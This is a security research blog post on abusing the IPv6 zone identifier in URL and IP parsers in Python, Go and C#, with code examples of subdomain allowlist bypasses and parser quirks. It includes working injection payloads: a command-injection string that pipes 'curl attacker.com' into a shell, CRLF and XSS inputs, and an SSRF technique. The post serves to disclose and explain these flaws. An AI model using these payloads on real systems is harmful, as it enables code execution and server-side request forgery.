Exploring IPv6 Zone Identifier

Posted on Apr 6, 2024

Introduction

This article is dedicated to a series of tricks utilizing the modern capabilities of IPv6 and the shortcomings of address parser implementations in standard libraries of popular programming languages.

IPv6 Zone

I think many people have an idea of what IPv6 and IPv4 addresses look like:

2001:0db8:85a3:0000:0000:8a2e:0370:7334 - IPv6
192.168.0.1 - IPv4

When including an IPv6 address in a URL, it needs to be enclosed in square brackets []:

http://[::1]/path?query=value#fragment

But many people forget about the Zone_ID concept in IPv6, let’s check RFC:

   In a URI, a literal IPv6 address is always embedded between "[" and
   "]".  This document specifies how a <zone_id> can be appended to the
   address.  According to URI syntax [RFC3986], "%" is always treated as
   an escape character in a URI, so, according to the established URI
   syntax [RFC3986] any occurrences of literal "%" symbols in a URI MUST
   be percent-encoded and represented in the form "%25".  Thus, the
   scoped address fe80::a%en1 would appear in a URI as
   http://[fe80::a%25en1].

Many will be surprised, but this is a valid IPv6 address:

[::1%slonser]

Whitelisted subomains

Golang and Python

Let’s consider the URL http://[::1]/. If we try to extract the hostname in different languages, we’ll get different results:

Go(Hostname), Python - ::1
Go(Host),C#, Java, PHP - [::1]

As seen in Go and Python, the IPv6 address will be returned without the square brackets []. To understand the potential issues this might cause, let’s consider some code examples: Python

from urllib.parse import urlparse

def is_subdomain_of_example(url_string):
    parsed_url = urlparse(url_string)
    if parsed_url.hostname:
        print(parsed_url.hostname)
        host_parts = parsed_url.hostname.split('.')
        if len(host_parts) >= 3 and host_parts[-2:] == ['example', 'com']:
            return True
    return False

def main():
    url = "..."
    if is_subdomain_of_example(url):
      print(url, "is a subdomain of example.com")
    else:
      print(url, "is not a subdomain of example.com")

if __name__ == "__main__":
    main()

And golang:

package main

import (
	"fmt"
	"net/url"
	"strings"
)

func isSubdomainOfExample(urlString string) bool {
	parsedURL, err := url.Parse(urlString)

	if err != nil {
		fmt.Println("Error:", err)
		return false
	}

	hostParts := strings.Split(parsedURL.Hostname(), ".")
	if len(hostParts) >= 3 && hostParts[len(hostParts)-2] == "example" && hostParts[len(hostParts)-1] == "com" {
		return true
	}
	return false
}

func main() {
	urlToCheck := "..."
	if isSubdomainOfExample(urlToCheck) {
		fmt.Println(urlToCheck, "is a subdomain of example.com")
	} else {
		fmt.Println(urlToCheck, "is not a subdomain of example.com")
	}
}

The essence of these code examples is roughly the same; they check whether the passed URL is a subdomain of example.com (a common method by splitting the URL based on dots).

Let’s leverage our knowledge of IPv6 Zone Identifier and use the following line:

https://[::1%25.example.com]

In both cases, we will see output:

http://[::1%25.example.com] is a subdomain of example.com

But if we execute requests to these addresses, they will be executed against the address [::1].

To make this logic safer, you just need to use .netloc in Python and .Host in Go. (These methods returns addresses in [])

C#

While I was testing this vector, I decided to look into how it’s implemented in the standard C# library. As mentioned earlier, C# returns the address without [], but it turned out that besides Host, there’s also DnsSafeHost, which is susceptible to the same issue.

using System;
using System.Net.Http;
using System.Threading.Tasks;

class Program
{
    static async Task<bool> IsSubdomainOfExampleAsync(string urlString)
    {
            Uri uri = new Uri(urlString);

            string[] hostParts = uri.DnsSafeHost.Split('.');
            if (hostParts.Length >= 3 && hostParts[^2] == "example" && hostParts[^1] == "com")
            {
                    return true;
            }
        return false;
    }

    static async Task Main()
    {
        string urlToCheck = "http://[::1%25.example.com]";
        if (await IsSubdomainOfExampleAsync(urlToCheck))
        {
            Console.WriteLine(urlToCheck + " is a subdomain of example.com");
        }
        else
        {
            Console.WriteLine(urlToCheck + " is not a subdomain of example.com");
        }
    }
}

ip_address and Injections

ipaddress.ip_address is the most common way to parse IP addresses in Python.

>>> import ipaddress
>>> ipaddress.ip_address('::1%slonser')
IPv6Address('::1%slonser')
>>> print(ipaddress.ip_address('::1%slonser'))
::1%slonser

We’ve confirmed that the library returns the Zone Identifier. It’s important to understand that many developers are not aware of this behavior, which leads to injections.

A few real-life examples:

URL formating

Example:

addr = ipaddress.ip_address('::1%61]@example.com#')
url = f"https://[{addr}]:80/info"

In such cases, it’s possible to bypass the brackets [] and redirect the request using @ to a destination different from what the developer expects. Also works with parsed_url._replace:

parsed_url._replace(netloc="[::1%61]@example.com")

RCE

In some cases (if you’re very lucky), this can lead to the possibility of executing code:

os.system(f"ping -c 1 {addr} > ./file")

We can’t use the “/” symbol, but it’s still possible to execute code:

>>> ipaddress.ip_address('::1%;curl attacker.com | sh;')
IPv6Address('::1%;curl attacker.com | sh;')

Another

It’s important to understand that achieving CRLF is also possible in some use cases:

>>> ipaddress.ip_address('::1%\r\nasd')
IPv6Address('::1%\r\nasd')

Also you can try to get XSS with:

https://[::1%<h1>slon<h1>]

Python will parse hostname as:

::1%<h1>slon<h1>

Also, it is important to understand that:

>>> ipaddress.ip_address('::1%a') == ipaddress.ip_address('::1%b')
False

When comparing, we will find that these are different addresses, but it is the same address, only leading through different zones. In some cases, this allows bypassing blacklist checks.

In fact, this provides ample room for attacks, as developers rarely consider that an IPv6 address could contain any injection. I won’t enumerate other possibilities.

Golang, golang…

Finally, I want to delve further into parsing the Zone Identifier in Golang and why it’s unique. Let’s dive into sources:

zone := strings.Index(host[:i], "%25")
		if zone >= 0 {
			host1, err := unescape(host[:zone], encodeHost)
			if err != nil {
				return "", err
			}
			host2, err := unescape(host[zone:i], encodeZone)
			if err != nil {
				return "", err
			}
			host3, err := unescape(host[i:], encodeHost)
			if err != nil {
				return "", err
			}
			return host1 + host2 + host3, nil

Here it can be noticed that Golang uses URL decoding for the passed Zone Identifier. Let’s take a closer look at how it works.

	urlToCheck := "http://[::1%2561%5d%3c%3e]"
	parsedURL, err := url.Parse(urlToCheck)
	if err != nil {
		fmt.Println("Error:", err)
	}
	fmt.Println(parsedURL.Hostname())
	fmt.Println(parsedURL.Host)

Will output:

::1%61]<>
[::1%61]<>]

( Yeah, we can close [] :)) You can use this for attacks based on IP parsing differences.

You might have also noticed that net/url simply searches for the first occurrence of %25 in the hostname. This behavior does not comply with the standards.

	urlToCheck := "http://[%2561]"
	parsedURL, err := url.Parse(urlToCheck)
	if err != nil {
		fmt.Println("Error:", err)
	}
	fmt.Println(parsedURL.Hostname())
	fmt.Println(parsedURL.Host)
    /*
    Output:%61
          [%61]

    */

It may seem to provide little benefit, but it can be exploited with another incorrect implementation in net/url.

urlToCheck := "http://[%2561.google.com]"
...
/*
Output: %61.google.com
       [%61.google.com]
*/

In some cases, this can help you achieve SSRF. It’s enough to set up a server where %61.attacker.com responds with a global address, while a.attacker.com responds with 127.0.0.1. In rare cases, you may be lucky enough to achieve SSRF.

Conclusion

In conclusion, I would like to say that the IPv6 Zone Identifier is useful because most developers believe that the IP address is a structure with a stricter format than it actually is. This misconception opens up a significant opportunity for attacks that are underestimated by the cybersecurity community.

It’s also worth noting that all designed parsers (supporting IPv6 Zone) have different implementations and parse addresses differently. I didn’t spend much time studying this topic; perhaps someone else can come up with many more interesting aspects related to this trick.